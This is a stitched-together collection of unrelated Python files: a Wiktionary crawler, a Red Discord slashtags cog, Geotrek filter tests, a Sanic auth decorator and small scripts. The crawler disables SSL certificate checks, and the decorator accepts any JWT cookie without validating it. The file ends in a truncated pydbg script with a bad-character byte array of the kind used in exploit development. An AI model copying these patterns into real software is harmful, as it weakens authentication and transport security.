# if a pattern 10 is found, counting from the left, swap them
if bit_lst[first_one+1] == '0':
swap(bit_lst, first_one, first_one+1)
else:
# look for index of the right side of string of ones
end_of_ones = first_one + bit_lst[first_one:].index('0') - 1
swap(bit_lst, end_of_ones, end_of_ones+1)
num_ones = end_of_ones - first_one + 1
# print("{} {}".format(first_one, end_of_ones))
# push left remaining ones
# fill with zeros
bit_lst[0:end_of_ones] = '0' * end_of_ones
# fill with ones
bit_lst[0:num_ones-1] = '1' * (num_ones-1)
# print("end_of_ones", end_of_ones)
return "".join(bit_lst)
def generate_bit_lst(items, n):
result = set()
bit_str = '1' * n + '0' * (items-n)
while bit_str != "END":
result.add(bit_str)
print(bit_str)
bit_str = push_bit(bit_str)
return result
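# Worked example: generate_bit_lst(4, 2) steps through
#   '1100' -> '1010' -> '0110' -> '1001' -> '0101' -> '0011'
# i.e. all C(4, 2) = 6 bit strings with exactly two ones set.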
# OBSERVATION: generate_bit_lst is the set of permutations of '11100'
# Computing permutations is expensive, though
|
999,363 | 3863823fdcbae751ff687516f847cdf4f07a4d14 | a = int(input())
b = int(input())
for r in range(a, b+1):
if r % 2 == 0:
print(r, end=' ')
|
999,364 | 56e5251ab360444ad6b7ccb2fcabe523a5d3d4db | """
This program scrapes each word from the Wiktionary pages. The starting page is "https://en.wiktionary.org/wiki/Wiktionary:All_Thesaurus_pages".
First we aim to build the scraper with one table and an sqlite3 database.
"""
from datetime import tzinfo, timedelta, datetime
import sqlite3
import time
import urllib.request, urllib.parse, urllib.error
from bs4 import BeautifulSoup
import ssl
import re
import os.path
import urllib.request
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
conn = sqlite3.connect('wikiDB.sqlite')
cur = conn.cursor()
cur.executescript('''
CREATE TABLE IF NOT EXISTS wiki_data (
cnc INTEGER,
pid INTEGER,
sid INTEGER,
url TEXT UNIQUE PRIMARY KEY,
html TEXT
);
''')
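# Column meanings (inferred from how the code uses them): cnc is a crawled
# flag (0 = pending, 1 = done), pid is the parent row's sid, sid is this
# row's own id, and url/html hold the page address and fetched markup.
# Note: url_crawl() recurses once per URL, so a long crawl will eventually
# hit Python's recursion limit; an iterative loop would be more robust.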
commit_var = 0
def url_crawl(url,pid):
global commit_var
unique_nurl = 0
commit_var += 1
try:
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req = urllib.request.Request(url, headers=headers)
html = urllib.request.urlopen(req).read() # html parser
soup = BeautifulSoup(html, 'html.parser')
cur.execute('''UPDATE wiki_data SET cnc = ? WHERE url = ?''',(1,url,))
cur.execute('''UPDATE wiki_data SET html = ? WHERE url = ?''',(str(soup),url,))
print(url,pid)
test_li = re.findall(r'<li>(.+)</li>',str(soup))
#print(test_li) # it have all the list element
url_str = 'https://en.wiktionary.org'
cur.execute(''' SELECT max(sid) FROM wiki_data''')
sid_max = cur.fetchone()[0] #converts the cursor object to number
print("max sid =-------------------------------------------------------------------------- ===> ",sid_max)
if sid_max == None:
sid_max = 0
sid = sid_max + 1
for item_li in test_li:
find_first = item_li.find('href="')
cut_first = find_first+6
string_cut = item_li[cut_first:]
find_sec = string_cut.find('"')
get_url_part = string_cut[:find_sec]
#print(get_url_part)
next_url = url_str + get_url_part
#print(next_url)
cur.execute('''INSERT OR IGNORE INTO wiki_data (cnc, pid, sid, url, html)
VALUES ( ?, ?, ?, ?, ? )''', ( 0,pid,sid, next_url, "", ) )
unique_nurl += 1
sid += 1
except:
        # The request or parsing failed; mark the URL as crawled and move on.
        print("Oops, something went wrong!")
        print("url :", url, "failed; skipping")
#set the cnc
cur.execute('''UPDATE wiki_data SET cnc = ? WHERE url = ?''',(1,url,))
#continue
cur.execute('''SELECT min(sid) FROM wiki_data WHERE cnc = ?''',(0,))
sid_ = cur.fetchone()[0] #converts the cursor object to number
print("min sid= ",sid_)
print("NEW UNIQUE URL FOUND :: ",unique_nurl)
get_next_url = cur.execute('''SELECT url FROM wiki_data WHERE sid = ?''',(sid_,)).fetchone()[0]
print("next url : ",get_next_url)
if commit_var%10==0:
print("CCCCCCCCCCCCCCCCCCCCCCCCCCOOOOOOOOOOOOOOOOOOOOOOOOOOMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMIIIIIIIIIIIIIIITTTTTTTTTTTTTTTTIIIIIIIIIIIIIIINNNNNNNNGGGGGGGGG")
conn.commit()
#print("*************************************************** sid ================",sid)
#time.sleep(3)
print("Current time : ",datetime.now().isoformat(timespec='seconds'))
print("Commit var : ",commit_var)
url_crawl(str(get_next_url),sid_-1)
if __name__ == "__main__":
cur.execute(''' SELECT max(sid) FROM wiki_data''')
sid_max = cur.fetchone()[0] #converts the cursor object to number
print("max sid = ",sid_max)
if sid_max == None:
sid_max = 0
print("none-----------")
#For the first time :)
url = "https://en.wiktionary.org/wiki/Wiktionary:All_Thesaurus_pages" # The first url that is entered, required for ignition
pid = 0 #parent id : 0
sid = 1 #self id : 0
cur.execute('''INSERT OR IGNORE INTO wiki_data (cnc, pid, sid, url, html)
VALUES ( ?, ?, ?, ?, ? )''', ( 0,pid,sid, url,"", ) )
# insert the cnc, pid, sid and url
url_crawl(url,1)
else:
# If the db exists
cur.execute('''SELECT min(sid) FROM wiki_data WHERE cnc = ?''',(0,))
sid_ = cur.fetchone()[0] #converts the cursor object to number
print("min sid= ",sid_)
get_next_url = cur.execute('''SELECT url FROM wiki_data WHERE sid = ?''',(sid_,)).fetchone()[0]
url_crawl(str(get_next_url),sid_-1)
|
999,365 | a920c63a3372a0bcde79fcfe08f2ca13c579807c | import asyncio
import logging
import re
import types
from collections import Counter
from copy import copy
from typing import Dict, List, Union
import discord
from redbot.core import commands
from redbot.core.utils.chat_formatting import box, humanize_list, inline, pagify
from redbot.core.utils.menus import DEFAULT_CONTROLS, menu
from redbot.core.utils.predicates import MessagePredicate
from tabulate import tabulate
from ..abc import MixinMeta
from ..converters import (
GlobalTagConverter,
GuildTagConverter,
PastebinConverter,
TagConverter,
TagName,
TagScriptConverter,
)
from ..http import SlashOptionType
from ..objects import (
ApplicationCommand,
ApplicationCommandType,
SlashOption,
SlashOptionChoice,
SlashTag,
)
from ..testing.button_menus import menu as button_menu
from ..utils import ARGUMENT_NAME_DESCRIPTION, chunks, dev_check
TAG_RE = re.compile(r"(?i)(\[p\])?\b(slash\s?)?tag'?s?\b")
CHOICE_RE = re.compile(r".{1,100}:.{1,100}")
CHOICE_LIMIT = 25
log = logging.getLogger("red.phenom4n4n.slashtags.commands")
def _sub(match: re.Match) -> str:
if match.group(1):
return "[p]slashtag global"
repl = "global "
name = match.group(0)
repl += name
if name.istitle():
repl = repl.title()
return repl
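# e.g. _sub rewrites "[p]tag" -> "[p]slashtag global" and "Tags" -> "Global Tags"
# so copy_doc can port guild-command help text to the global command group.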
def copy_doc(original: Union[commands.Command, types.FunctionType]):
def decorator(overriden: Union[commands.Command, types.FunctionType]):
doc = original.help if isinstance(original, commands.Command) else original.__doc__
doc = TAG_RE.sub(_sub, doc)
if isinstance(overriden, commands.Command):
overriden._help_override = doc
else:
overriden.__doc__ = doc
return overriden
return decorator
class Commands(MixinMeta):
@commands.guild_only()
@commands.group(aliases=["st"])
async def slashtag(self, ctx: commands.Context):
"""
Slash Tag management with TagScript.
These commands use TagScriptEngine.
[This site](https://phen-cogs.readthedocs.io/en/latest/index.html) has documentation on how to use TagScript blocks.
"""
@commands.mod_or_permissions(manage_guild=True)
@slashtag.command("add", aliases=["create", "+"])
async def slashtag_add(
self,
ctx: commands.Context,
tag_name: TagName(check_global=False),
*,
tagscript: TagScriptConverter,
):
"""
Add a slash tag with TagScript.
[Slash tag usage guide](https://phen-cogs.readthedocs.io/en/latest/slashtags/slashtags.html)
"""
await self.create_slash_tag(ctx, tag_name, tagscript, is_global=False)
async def create_slash_tag(
self,
ctx: commands.Context,
tag_name: str,
tagscript: str,
*,
is_global: bool = False,
command_type: ApplicationCommandType = ApplicationCommandType.CHAT_INPUT,
):
options: List[SlashOption] = []
guild_id = None if is_global else ctx.guild.id
if command_type == ApplicationCommandType.CHAT_INPUT:
try:
description = await self.send_and_query_response(
ctx,
"What should the tag description to be? (maximum 100 characters)",
pred=MessagePredicate.length_less(101, ctx),
)
except asyncio.TimeoutError:
return await ctx.send("Tag addition timed out.")
else:
description = ""
if command_type == ApplicationCommandType.CHAT_INPUT:
pred = MessagePredicate.yes_or_no(ctx)
try:
await self.send_and_query_response(
ctx, "Would you like to add arguments to this tag? (Y/n)", pred
)
except asyncio.TimeoutError:
await ctx.send("Query timed out, not adding arguments.")
else:
if pred.result is True:
await self.get_options(ctx, options)
command = ApplicationCommand(
self,
name=tag_name,
description=description,
guild_id=guild_id,
options=options,
type=command_type,
)
try:
await command.register()
except discord.Forbidden as error:
log.error(
f"Failed to create command {command!r} on guild {ctx.guild!r}", exc_info=error
)
text = (
"Looks like I don't have permission to add Slash Commands here. Reinvite me "
"with this invite link and try again: <https://discordapp.com/oauth2/authorize"
f"?client_id={self.bot.user.id}&scope=bot%20applications.commands>"
)
return await ctx.send(text)
except Exception as error:
log.error(f"Failed to create command {command!r} on guild {ctx.guild!r}")
# exc info unneeded since error handler should print it, however info on the command options is needed
raise
tag = SlashTag(
self,
tagscript,
guild_id=guild_id,
author_id=ctx.author.id,
command=command,
)
self.command_cache[tag.command.id] = tag.command
await ctx.send(await tag.initialize())
async def get_options(
self, ctx: commands.Context, options: List[SlashOption]
) -> List[SlashOption]:
added_required = False
for i in range(1, 11):
try:
option = await self.get_option(ctx, added_required=added_required)
if not option.required:
added_required = True
except asyncio.TimeoutError:
await ctx.send("Adding this argument timed out.", delete_after=15)
break
options.append(option)
if i == 10:
break
pred = MessagePredicate.yes_or_no(ctx)
try:
await self.send_and_query_response(
ctx, "Would you like to add another argument? (Y/n)", pred
)
except asyncio.TimeoutError:
await ctx.send("Query timed out, not adding additional arguments.")
break
if pred.result is False:
break
return options
async def send_and_query_response(
self,
ctx: commands.Context,
query: str,
pred: MessagePredicate = None,
*,
timeout: int = 60,
) -> str:
if pred is None:
pred = MessagePredicate.same_context(ctx)
ask = await ctx.send(query)
try:
message = await self.bot.wait_for("message", check=pred, timeout=timeout)
except asyncio.TimeoutError:
await self.delete_quietly(ask)
raise
await self.delete_quietly(ask)
await self.delete_quietly(message)
return message.content
async def get_choices(self, ctx: commands.Context) -> List[SlashOptionChoice]:
query = (
"Send the list of choice names and values you would like to add as choices to "
"the tag. Choice names and values should be seperated by `:`, and each choice "
"should be seperated by `|`. Example:\n`dog:Doggo|cat:Catto`"
)
response = await self.send_and_query_response(ctx, query)
choices = []
for index, choice_text in enumerate(response.split("|"), 1):
if ":" not in choice_text:
await ctx.send(
f"Failed to parse `{choice_text}` to a choice as its name and value "
"weren't seperated by a `:`.",
delete_after=15,
)
continue
if not CHOICE_RE.match(choice_text):
await ctx.send(
f"Failed to parse `{choice_text}` to a choice as "
"its name or value exceeded the 100 character limit.",
delete_after=15,
)
continue
choice = SlashOptionChoice(*choice_text.split(":", 1))
choices.append(choice)
if len(choices) >= CHOICE_LIMIT:
await ctx.send(f"Reached max choices ({CHOICE_LIMIT}).")
break
return choices
async def get_option(
self, ctx: commands.Context, *, added_required: bool = False
) -> SlashOption:
name_desc = [
"What should the argument name be and description be?",
"The argument name and description should be split by a `:`.",
"Example: `member:A member of this server.`\n",
"*Slash argument names may not exceed 32 characters and can only contain characters "
"that are alphanumeric or '_' or '-'.",
"The argument description must be less than or equal to 100 characters.*",
]
name_pred = MessagePredicate.regex(ARGUMENT_NAME_DESCRIPTION, ctx)
await self.send_and_query_response(ctx, "\n".join(name_desc), name_pred)
match = name_pred.result
name, description = match.group(1), match.group(2)
valid_option_types = [
name.lower()
for name in SlashOptionType.__members__.keys()
if not name.startswith("SUB")
]
valid_option_types.append("choices")
option_query = [
"What should the argument type be?",
f"Valid option types: {humanize_list([inline(n) for n in valid_option_types])}",
"(select `string` if you don't understand)",
]
option_type = await self.send_and_query_response(
ctx,
"\n".join(option_query),
MessagePredicate.lower_contained_in(valid_option_types, ctx),
)
if option_type.lower() == "choices":
choices = await self.get_choices(ctx)
option_type = "STRING"
else:
choices = []
option_type = SlashOptionType[option_type.upper()]
if not added_required:
pred = MessagePredicate.yes_or_no(ctx)
await self.send_and_query_response(
ctx,
"Is this argument required? (Y/n)\n*Keep in mind that if you choose to make this argument optional, all following arguments must also be optional.*",
pred,
)
required = pred.result
else:
await ctx.send(
"This argument was automatically made optional as the previous one was optional.",
delete_after=15,
)
required = False
return SlashOption(
name=name.lower(),
description=description,
option_type=option_type,
required=required,
choices=choices,
)
@commands.mod_or_permissions(manage_guild=True)
@slashtag.command("message")
async def slashtag_message(
self,
ctx: commands.Context,
tag_name: TagName(check_global=False, check_regex=False),
*,
tagscript: TagScriptConverter,
):
"""
Add a message command tag with TagScript.
[Slash tag usage guide](https://phen-cogs.readthedocs.io/en/latest/slashtags/slashtags.html)
"""
await self.create_slash_tag(
ctx, tag_name, tagscript, is_global=False, command_type=ApplicationCommandType.MESSAGE
)
@commands.mod_or_permissions(manage_guild=True)
@slashtag.command("user")
async def slashtag_user(
self,
ctx: commands.Context,
tag_name: TagName(check_global=False, check_regex=False),
*,
tagscript: TagScriptConverter,
):
"""
Add a user command tag with TagScript.
[Slash tag usage guide](https://phen-cogs.readthedocs.io/en/latest/slashtags/slashtags.html)
"""
await self.create_slash_tag(
ctx, tag_name, tagscript, is_global=False, command_type=ApplicationCommandType.USER
)
@commands.mod_or_permissions(manage_guild=True)
@slashtag.command("pastebin", aliases=["++"])
async def slashtag_pastebin(
self,
ctx: commands.Context,
tag_name: TagName(check_global=False),
*,
link: PastebinConverter,
):
"""
Add a slash tag with a Pastebin link.
"""
await self.create_slash_tag(ctx, tag_name, link, is_global=False)
@commands.mod_or_permissions(manage_guild=True)
@slashtag.group("edit", aliases=["e"], invoke_without_command=True)
async def slashtag_edit(
self, ctx: commands.Context, tag: GuildTagConverter, *, tagscript: TagScriptConverter
):
"""Edit a slash tag."""
await ctx.send(await tag.edit_tagscript(tagscript))
@slashtag_edit.command("tagscript")
async def slashtag_edit_tagscript(
self, ctx: commands.Context, tag: GuildTagConverter, *, tagscript: TagScriptConverter
):
"""Edit a slash tag's TagScript."""
await self.slashtag_edit(ctx, tag, tagscript=tagscript)
@slashtag_edit.command("name")
async def slashtag_edit_name(
self, ctx: commands.Context, tag: GuildTagConverter, *, name: TagName(check_global=False)
):
"""Edit a slash tag's name."""
await ctx.send(await tag.edit_name(name))
@slashtag_edit.command("description")
async def slashtag_edit_description(
self, ctx: commands.Context, tag: GuildTagConverter, *, description: str
):
"""Edit a slash tag's description."""
await ctx.send(await tag.edit_description(description))
@slashtag_edit.command("arguments", aliases=["options"])
async def slashtag_edit_arguments(self, ctx: commands.Context, tag: GuildTagConverter):
"""
Edit a slash tag's arguments.
See [this documentation page](https://phen-cogs.readthedocs.io/en/latest/slashtags/slash_arguments.html) for more information on slash tag arguments.
"""
await tag.edit_options(ctx)
@slashtag_edit.command("argument", aliases=["option"])
async def slashtag_edit_argument(
self, ctx: commands.Context, tag: GuildTagConverter, argument: str
):
"""Edit a single slash tag's argument by name."""
await tag.edit_single_option(ctx, argument)
@commands.mod_or_permissions(manage_guild=True)
@slashtag.command("remove", aliases=["delete", "-"])
async def slashtag_remove(self, ctx: commands.Context, *, tag: GuildTagConverter):
"""Delete a slash tag."""
await ctx.send(await tag.delete())
@slashtag.command("info")
async def slashtag_info(self, ctx: commands.Context, *, tag: TagConverter):
"""Get info about a slash tag that is stored on this server."""
await tag.send_info(ctx)
@slashtag.command("raw")
async def slashtag_raw(self, ctx: commands.Context, *, tag: GuildTagConverter):
"""Get a slash tag's raw content."""
await tag.send_raw_tagscript(ctx)
@classmethod
def format_tagscript(cls, tag: SlashTag, limit: int = 60) -> str:
title = f"`{tag.type.get_prefix()}{tag.name}` - "
limit -= len(title)
tagscript = tag.tagscript
if len(tagscript) > limit - 3:
tagscript = tagscript[:limit - 3] + "..."
tagscript = tagscript.replace("\n", " ")
return f"{title}{discord.utils.escape_markdown(tagscript)}"
async def view_slash_tags(
self,
ctx: commands.Context,
tags: Dict[int, SlashTag],
*,
is_global: bool,
):
description = [
self.format_tagscript(tag) for tag in sorted(tags.values(), key=lambda t: t.name)
]
description = "\n".join(description)
e = discord.Embed(color=await ctx.embed_color())
if is_global:
slash_tags = "global slash tags"
e.set_author(name="Global Slash Tags", icon_url=ctx.me.avatar_url)
else:
slash_tags = "slash tags"
e.set_author(name="Stored Slash Tags", icon_url=ctx.guild.icon_url)
embeds = []
pages = list(pagify(description))
for index, page in enumerate(pages, 1):
embed = e.copy()
embed.description = page
embed.set_footer(text=f"{index}/{len(pages)} | {len(tags)} {slash_tags}")
embeds.append(embed)
# await menu(ctx, embeds, DEFAULT_CONTROLS)
await button_menu(ctx, embeds)
@slashtag.command("list")
async def slashtag_list(self, ctx: commands.Context):
"""View stored slash tags."""
tags = self.guild_tag_cache[ctx.guild.id]
if not tags:
return await ctx.send("There are no slash tags on this server.")
await self.view_slash_tags(ctx, tags, is_global=False)
async def show_slash_tag_usage(self, ctx: commands.Context, guild: discord.Guild = None):
tags = self.guild_tag_cache[guild.id] if guild else self.global_tag_cache
if not tags:
message = (
"This server has no slash tags." if guild else "There are no global slash tags."
)
return await ctx.send(message)
counter = Counter({tag.name: tag.uses for tag in tags.copy().values()})
e = discord.Embed(title="Slash Tag Stats", color=await ctx.embed_color())
embeds = []
for usage_data in chunks(counter.most_common(), 10):
usage_chart = box(tabulate(usage_data, headers=("Tag", "Uses")), "prolog")
embed = e.copy()
embed.description = usage_chart
embeds.append(embed)
await menu(ctx, embeds, DEFAULT_CONTROLS)
@slashtag.command("usage", aliases=["stats"])
async def slashtag_usage(self, ctx: commands.Context):
"""
See usage stats for this server's slash tags.
**Example:**
`[p]slashtag usage`
"""
await self.show_slash_tag_usage(ctx, ctx.guild)
@commands.is_owner()
@slashtag.command("clear", hidden=True)
async def slashtag_clear(self, ctx: commands.Context):
"""Clear all slash tags for this server."""
pred = MessagePredicate.yes_or_no(ctx)
try:
await self.send_and_query_response(
ctx, "Are you sure you want to delete all slash tags on this server? (Y/n)", pred
)
except asyncio.TimeoutError:
return await ctx.send("Timed out, not deleting slash tags.")
if not pred.result:
return await ctx.send("Ok, not deleting slash tags.")
guild: discord.Guild = ctx.guild
await self.http.put_guild_slash_commands(guild.id, [])
for tag in copy(self.guild_tag_cache[guild.id]).values():
tag.remove_from_cache()
tag.command.remove_from_cache()
del tag
self.guild_tag_cache[guild.id].clear()
await self.config.guild(guild).tags.clear()
await ctx.send("Tags deleted.")
@commands.is_owner()
@slashtag.group("global")
@copy_doc(slashtag)
async def slashtag_global(self, ctx: commands.Context):
pass
@slashtag_global.command("add")
@copy_doc(slashtag_add)
async def slashtag_global_add(
self,
ctx: commands.Context,
tag_name: TagName(global_priority=True),
*,
tagscript: TagScriptConverter,
):
await self.create_slash_tag(ctx, tag_name, tagscript, is_global=True)
@commands.mod_or_permissions(manage_guild=True)
@slashtag_global.command("message")
@copy_doc(slashtag_message)
async def slashtag_global_message(
self,
ctx: commands.Context,
tag_name: TagName(global_priority=True, check_regex=False),
*,
tagscript: TagScriptConverter,
):
await self.create_slash_tag(
ctx, tag_name, tagscript, is_global=True, command_type=ApplicationCommandType.MESSAGE
)
@commands.mod_or_permissions(manage_guild=True)
@slashtag_global.command("user")
@copy_doc(slashtag_user)
async def slashtag_global_user(
self,
ctx: commands.Context,
tag_name: TagName(global_priority=True, check_regex=False),
*,
tagscript: TagScriptConverter,
):
await self.create_slash_tag(
ctx, tag_name, tagscript, is_global=True, command_type=ApplicationCommandType.USER
)
@slashtag_global.command("pastebin", aliases=["++"])
@copy_doc(slashtag_pastebin)
async def slashtag_global_pastebin(
self,
ctx: commands.Context,
tag_name: TagName(global_priority=True),
*,
link: PastebinConverter,
):
await self.create_slash_tag(ctx, tag_name, link, is_global=True)
@slashtag_global.group("edit", aliases=["e"], invoke_without_command=True)
@copy_doc(slashtag_edit)
async def slashtag_global_edit(
self, ctx: commands.Context, tag: GlobalTagConverter, *, tagscript: TagScriptConverter
):
await ctx.send(await tag.edit_tagscript(tagscript))
@slashtag_global_edit.command("tagscript")
@copy_doc(slashtag_edit_tagscript)
async def slashtag_global_edit_tagscript(
self, ctx: commands.Context, tag: GlobalTagConverter, *, tagscript: TagScriptConverter
):
await self.slashtag_global_edit(ctx, tag, tagscript=tagscript)
@slashtag_global_edit.command("name")
@copy_doc(slashtag_edit_name)
async def slashtag_global_edit_name(
self,
ctx: commands.Context,
tag: GlobalTagConverter,
*,
name: TagName(global_priority=True),
):
await ctx.send(await tag.edit_name(name))
@slashtag_global_edit.command("description")
@copy_doc(slashtag_edit_description)
async def slashtag_global_edit_description(
self, ctx: commands.Context, tag: GlobalTagConverter, *, description: str
):
await ctx.send(await tag.edit_description(description))
@slashtag_global_edit.command("arguments", aliases=["options"])
@copy_doc(slashtag_edit_arguments)
async def slashtag_global_edit_arguments(self, ctx: commands.Context, tag: GlobalTagConverter):
await tag.edit_options(ctx)
@slashtag_global_edit.command("argument", aliases=["option"])
@copy_doc(slashtag_edit_argument)
async def slashtag_global_edit_argument(
self, ctx: commands.Context, tag: GlobalTagConverter, argument: str
):
await tag.edit_single_option(ctx, argument)
@slashtag_global.command("remove", aliases=["delete", "-"])
@copy_doc(slashtag_remove)
async def slashtag_global_remove(self, ctx: commands.Context, *, tag: GlobalTagConverter):
await ctx.send(await tag.delete())
@slashtag_global.command("raw")
@copy_doc(slashtag_raw)
async def slashtag_global_raw(self, ctx: commands.Context, *, tag: GlobalTagConverter):
await tag.send_raw_tagscript(ctx)
@slashtag_global.command("list")
@copy_doc(slashtag_list)
async def slashtag_global_list(self, ctx: commands.Context):
tags = self.global_tag_cache
if not tags:
return await ctx.send("There are no global slash tags.")
await self.view_slash_tags(ctx, tags, is_global=True)
@slashtag_global.command("usage", aliases=["stats"])
@copy_doc(slashtag_usage)
async def slashtag_global_usage(self, ctx: commands.Context):
await self.show_slash_tag_usage(ctx)
@commands.is_owner()
@commands.group(aliases=["slashset"])
async def slashtagset(self, ctx: commands.Context):
"""Manage SlashTags settings."""
@slashtagset.command("settings")
async def slashtagset_settings(self, ctx: commands.Context):
"""View SlashTags settings."""
eval_command = f"✅ (**{self.eval_command}**)" if self.eval_command else "❎"
testing_enabled = f"✅" if self.testing_enabled else "❎"
description = [
f"Application ID: **{self.application_id}**",
f"Eval command: {eval_command}",
f"Test cog loaded: {testing_enabled}",
]
embed = discord.Embed(
color=0xC9C9C9, title="SlashTags Settings", description="\n".join(description)
)
await ctx.send(embed=embed)
@slashtagset.command("appid")
async def slashtagset_appid(self, ctx: commands.Context, id: int = None):
"""
Manually set the application ID for [botname] slash commands if it differs from the bot user ID.
This only applies to legacy bots. If you don't know what this means, you don't need to worry about it.
"""
app_id = id or self.bot.user.id
await self.config.application_id.set(app_id)
self.application_id = app_id
await ctx.send(f"Application ID set to `{id}`.")
@commands.check(dev_check)
@slashtagset.command("addeval")
async def slashtagset_addeval(self, ctx: commands.Context):
"""Add a slash eval command for debugging."""
if self.eval_command:
return await ctx.send("An eval command is already registered.")
slasheval = ApplicationCommand(
self,
name="eval",
description="SlashTags debugging eval command. Only bot owners can use this.",
options=[
SlashOption(name="body", description="Code body to evaluate.", required=True)
],
)
await slasheval.register()
await self.config.eval_command.set(slasheval.id)
self.eval_command = slasheval.id
await ctx.send("`/eval` has been registered.")
@commands.check(dev_check)
@slashtagset.command("rmeval")
async def slashtagset_rmeval(self, ctx: commands.Context):
"""Remove the slash eval command."""
if not self.eval_command:
return await ctx.send("The eval command hasn't been registered.")
try:
await self.http.remove_slash_command(self.eval_command)
except discord.HTTPException:
pass
await self.config.eval_command.clear()
self.eval_command = None
await ctx.send("`/eval` has been deleted.")
@slashtagset.command("testing")
async def slashtagset_testing(self, ctx: commands.Context, true_or_false: bool = None):
"""
Load or unload the SlashTag interaction development test cog.
"""
target_state = (
true_or_false if true_or_false is not None else not await self.config.testing_enabled()
)
if target_state is self.testing_enabled:
loaded = "loaded" if target_state else "unloaded"
return await ctx.send(f"The SlashTag interaction testing cog is already {loaded}.")
await self.config.testing_enabled.set(target_state)
if target_state:
loaded = "Loaded"
self.add_test_cog()
else:
loaded = "Unloaded"
self.remove_test_cog()
await ctx.send(f"{loaded} the SlashTag interaction testing cog.")
|
999,366 | 71c8c555ff36981026018503e04b550e40385cd0 | from django.apps import AppConfig
import os
default_app_config = 'apps.base_info.apps.BaseInfoConfig'
|
999,367 | 9f98fbf03e50e6a9a480f9978814fb8346241ba0 | from unittest import skipIf
from django.conf import settings
from django.contrib.gis.geos import LineString, Point
from django.test import TestCase
from geotrek.land.tests.test_filters import LandFiltersTest
from geotrek.core.factories import PathFactory, TrailFactory
from geotrek.core.filters import PathFilterSet, TopologyFilter
from geotrek.core.models import Topology
from geotrek.trekking.factories import TrekFactory
from geotrek.trekking.filters import TrekFilterSet
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
class PathFilterLandTest(LandFiltersTest):
filterclass = PathFilterSet
class TestFilter(TopologyFilter):
model = Topology
class TopologyFilterTest(TestCase):
def test_values_to_edges(self):
topology = TestFilter()
with self.assertRaises(NotImplementedError):
topology.values_to_edges(['Value'])
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
class TopologyFilterTrailTest(TestCase):
def setUp(self):
self.path = PathFactory()
self.trail = TrailFactory(paths=[(self.path, 0, 1)])
def test_trail_filters(self):
PathFactory()
qs = PathFilterSet().qs
self.assertEqual(qs.count(), 2)
data = {'trail': [self.trail]}
qs = PathFilterSet(data=data).qs
self.assertEqual(qs.count(), 1)
class ValidTopologyFilterTest(TestCase):
def setUp(self):
if settings.TREKKING_TOPOLOGY_ENABLED:
self.path = PathFactory()
self.trek = TrekFactory.create(name="Crossed", paths=[(self.path, 0, 1)])
else:
self.trek = TrekFactory.create(geom=LineString((0, 0), (5, 5)))
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_trek_filters_not_valid(self):
trek = TrekFactory.create(name="Not crossed", paths=[(self.path, 0, 0.5)])
TrekFactory.create(paths=[])
qs = TrekFilterSet().qs
self.assertEqual(qs.count(), 3)
data = {'is_valid': True}
qs = TrekFilterSet(data=data).qs
self.assertIn(self.trek, qs)
self.assertEqual(qs.count(), 2)
data = {'is_valid': False}
qs = TrekFilterSet(data=data).qs
self.assertEqual(qs.count(), 1)
geom = LineString(Point(700100, 6600000), Point(700000, 6600100), srid=settings.SRID)
PathFactory.create(geom=geom)
self.trek.reload()
trek.reload()
data = {'is_valid': True}
qs = TrekFilterSet(data=data).qs
self.assertNotIn(self.trek, qs)
self.assertIn(trek, qs)
self.assertEqual(qs.count(), 1)
data = {'is_valid': False}
qs = TrekFilterSet(data=data).qs
self.assertIn(self.trek, qs)
self.assertNotIn(trek, qs)
self.assertEqual(qs.count(), 2)
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_trek_filters_not_valid_nds(self):
TrekFactory.create(name="Empty", geom='SRID=2154;LINESTRING EMPTY')
qs = TrekFilterSet().qs
self.assertEqual(qs.count(), 2)
data = {'is_valid': True}
qs = TrekFilterSet(data=data).qs
self.assertIn(self.trek, qs)
self.assertEqual(qs.count(), 1)
data = {'is_valid': False}
qs = TrekFilterSet(data=data).qs
self.assertEqual(qs.count(), 1)
|
999,368 | a0ce739de2ed18a8463b7f2df2563bd58e438c27 |
from functools import wraps
from sanic.response import redirect
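# Presence-only gate for Sanic handlers: the wrapped handler runs only when both
# the 'lock-jwt' and 'lock-rtk' cookies exist; otherwise the client is redirected
# to '/'. Note the tokens are only checked for presence here, not validated.
# Usage sketch (hypothetical route name):
# @app.route('/dashboard')
# @jwt_required()
# async def dashboard(request):
#     ...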
def jwt_required():
def decorator(f):
@wraps(f)
async def decorated_function(request, *args, **kwargs):
json_token = request.cookies.get('lock-jwt')
refresh_token = request.cookies.get('lock-rtk')
if json_token != None and refresh_token != None:
response = await f(request, *args, **kwargs)
return response
return redirect('/')
return decorated_function
return decorator |
999,369 | e1de8a813d1741fd014fc966401faa3b7775050a | import subprocess
subprocess.call(["/opt/imt/robot/crob/tools/plcenter"])
|
999,370 | b9bfa4cc40d8d30040b7fcc544351b15b66398f1 | #!/usr/bin/python
import sys
import socket
import struct
from pydbg import *
from pydbg.defines import *
import pythoncom
import struct
import random
import wmi
import subprocess
import os
import time
import threading
from threading import Lock, Thread
allchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
